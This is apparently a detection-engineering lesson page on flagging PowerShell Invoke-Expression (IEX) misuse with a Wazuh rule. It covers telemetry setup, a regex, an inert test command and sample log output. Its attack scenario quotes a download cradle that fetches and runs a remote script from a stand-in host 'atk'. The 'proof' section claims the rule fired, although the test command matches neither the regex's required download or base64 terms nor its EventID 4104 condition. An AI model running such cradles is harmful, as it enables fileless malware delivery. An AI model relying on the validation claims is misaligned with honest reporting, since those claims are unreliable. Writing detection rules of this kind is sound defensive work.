DetectionHunter
back to roadmap
Phase 1·T1059.001·Easy

Detecting Invoke-Expression (IEX) Misuse

Flag Invoke-Expression / IEX patterns that execute downloaded or in-memory strings.

#Windows#PowerShell#ATT&CK

Detection Objective

Detect IEX or Invoke-Expression executing dynamic strings — typically piped from Net.WebClient, DownloadString, or [Convert]::FromBase64String.

Real-World Attack Scenario

A staged loader runs: IEX (New-Object Net.WebClient).DownloadString('http://atk/stage.ps1') to pull and execute a remote PowerShell payload in memory without touching disk.

Why This Detection Matters

IEX with dynamic input is the de-facto fileless execution primitive. Detecting it early disrupts the chain before the second stage runs.

ATT&CK Mapping

T1059.001 · PowerShell
Tactic: Execution

Required Telemetry

  • PowerShellScript Block Logging 4104 (best signal — sees decoded body)
  • SysmonEvent ID 1 — command line
Windows Event IDs
4688
Sysmon Event IDs
1
Wazuh Log Source
Microsoft-Windows-PowerShell/Operational, Sysmon/Operational

Setup Steps

  1. Enable PowerShell Script Block Logging (4104).
  2. Forward Microsoft-Windows-PowerShell/Operational to Wazuh.

Safe Validation Command

Safe equivalent — IEX evaluating an inert literal.
powershell.exe -c "IEX 'Write-Host detection-test'"
⚠ lab use only · this project does not execute real malware

Expected Log Output

EventID 4104
ScriptBlockText: IEX 'Write-Host detection-test'
Path: <ScriptBlock>

Detection Logic (Wazuh rule concept)

EventID=4104 AND ScriptBlockText matches /(?i)(Invoke-Expression|\bIEX\b).*(DownloadString|FromBase64String|Net\.WebClient|IWR|Invoke-WebRequest)/

False Positives

  • Admin scripts that legitimately use IEX with constant input

Tuning Recommendations

  • Require dynamic input source (network or base64) before alerting.

Analyst Triage Notes

  • Pull the full ScriptBlockText and the parent process tree.

Detection Improvement Ideas

  • Combine with Sysmon EID 3 to confirm outbound C2.

log analysis layer

Detection is not complete until the logs prove what happened. The sections below show the telemetry produced by the validation above, how to read it like an analyst, and why this pattern matters.

siem · log evidence
rule 100653
Detecting Invoke-Expression (IEX) Misuse
Microsoft-Windows-PowerShell/Operational, Sysmon/Operational
Event ID
Sysmon EID 1
Image
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent
C:\Windows\explorer.exe
CommandLine
powershell.exe -c "IEX 'Write-Host detection-test'"
User
CORP\j.doe
Agent
WIN10-LAB-01
Timestamp
2026-05-26T14:32:11Z
analyst note
Pull the full ScriptBlockText and the parent process tree.

Parent → Child Analysis

explorer.exe → powershell.exe — review whether this lineage is expected for WIN10-LAB-01 and user CORP\j.doe.

Command-Line Flags Observed

  • IEX / Invoke-Expression
    Executes dynamic strings — the core primitive of fileless loaders.

Parsed Fields the Analyst Reads

  • ImageProcess binary that executed — confirms PowerShell.
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentImageWho launched it — context for legitimacy.
    C:\Windows\explorer.exe
  • CommandLineArguments — where attacker intent shows up.
    powershell.exe -c "IEX 'Write-Host detection-test'"
  • UserAccount context — service vs interactive vs SYSTEM.
    CORP\j.doe
  • EventIDTelemetry channel and event type.
    Sysmon EID 1
  • Wazuh Rule IDRule that matched and produced this alert.
    100653
  • AgentEndpoint that produced the telemetry.
    WIN10-LAB-01
  • TimestampWhen it happened — anchor for correlation.
    2026-05-26T14:32:11Z

Malicious Pattern

pattern
Invoke-Expression (IEX) Misuse
description
A staged loader runs: IEX (New-Object Net.WebClient).DownloadString('http://atk/stage.ps1') to pull and execute a remote PowerShell payload in memory without touching disk.
analyst takeaway
IEX with dynamic input is the de-facto fileless execution primitive. Detecting it early disrupts the chain before the second stage runs. Treat this signal as higher-risk when combined with suspicious parents, hidden windows, download cradles, or unusual user context.

proof the detection worked

test command
powershell.exe -c "IEX 'Write-Host detection-test'"
expected event
Sysmon EID 1 on WIN10-LAB-01 with Image=powershell.exe and the validation command above in CommandLine.
expected wazuh alert
Wazuh rule 100653 — "Detecting Invoke-Expression (IEX) Misuse" fires at a level matching severity=high.
confirming log fields
ImageParentImageCommandLineUserEventID
analyst interpretation
The recorded fields satisfy every clause of the detection logic. Parent process, user context, and command-line arguments together prove the behavior was observed end to end.
conclusion
Detection succeeded: telemetry was captured, the rule matched, and the alert reached the analyst with enough context to triage.